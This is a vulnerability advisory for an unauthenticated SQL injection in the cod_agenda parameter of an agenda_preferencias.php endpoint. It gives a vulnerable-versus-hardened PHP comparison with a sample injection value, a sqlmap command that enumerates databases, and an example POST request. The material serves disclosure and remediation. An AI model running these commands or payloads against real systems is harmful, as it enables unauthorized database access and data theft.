CVE-2025-9606

SQL Injection

CVE-2025-9606: SQL Injection (Blind Time-Based) Vulnerability in cod_agenda Parameter on agenda_preferencias.php Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-9606

Summary

A SQL Injection vulnerability was discovered in the cod_agenda parameter of the agenda_preferencias.php endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.

Details

The application fails to properly sanitize user-supplied input in the cod_agenda parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.
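The pattern described above, shown beside a hardened form, as an added example that is not the application's own code. The table and column names are hypothetical, and in-memory SQLite stands in for the PostgreSQL backend so the script runs offline. The second sample value is constructed.

```php
<?php
declare(strict_types=1);

// Added example: table and column names are hypothetical, and in-memory SQLite
// stands in for the PostgreSQL backend so the script runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE agenda (cod_agenda INTEGER PRIMARY KEY, nm_agenda TEXT)');
$pdo->exec("INSERT INTO agenda VALUES (1, 'Direction'), (2, 'Secretariat'), (3, 'Library')");

// Vulnerable pattern: the raw parameter is concatenated into the SQL text,
// so anything after the number is parsed as SQL by the database.
function findAgendaUnsafe(PDO $pdo, string $codAgenda): array
{
    $sql = 'SELECT cod_agenda, nm_agenda FROM agenda WHERE cod_agenda = ' . $codAgenda;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: accept only a positive integer, then bind it as a typed
// parameter so the value never becomes part of the SQL text.
function findAgendaSafe(PDO $pdo, string $codAgenda): array
{
    $id = filter_var($codAgenda, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('cod_agenda must be a positive integer');
    }
    $stmt = $pdo->prepare('SELECT cod_agenda, nm_agenda FROM agenda WHERE cod_agenda = :cod');
    $stmt->bindValue(':cod', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Body from the example request, then a constructed variant with SQL appended.
parse_str('tipoacao=Editar&cod_agenda=2&envia_alerta=0&agenda_display=2', $form);
$samples = [$form['cod_agenda'], '2 OR 1=1'];

foreach ($samples as $value) {
    printf("cod_agenda=%s\n  unsafe rows: %d\n", $value, count(findAgendaUnsafe($pdo, $value)));
    try {
        printf("  safe rows:   %d\n", count(findAgendaSafe($pdo, $value)));
    } catch (InvalidArgumentException $e) {
        printf("  safe:        rejected (%s)\n", $e->getMessage());
    }
}
```

With the concatenated query the constructed value changes which rows match, while the hardened function rejects it before any SQL is prepared.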

PoC

Vulnerable Endpoint: agenda_preferencias.php

Parameter: cod_agenda

Command:

sqlmap -r req.txt --risk=3 --level=5 --dbs --dbms=PostgreSQL --batch

Example Request

POST /intranet/agenda_preferencias.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/intranet/agenda_preferencias.php
Cookie: [COOKIE]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

tipoacao=Editar&cod_agenda=2&envia_alerta=0&agenda_display=2

Impact

  • Unauthorized access to sensitive data (e.g., users, passwords, logs).
  • Database enumeration (schemas, tables, users, versions).
  • Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).
  • Full compromise of the application if chained with other vulnerabilities.
  • This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.

Reference

https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9606.md

Finder

Marcelo Queiroz

By: CVE-Hunters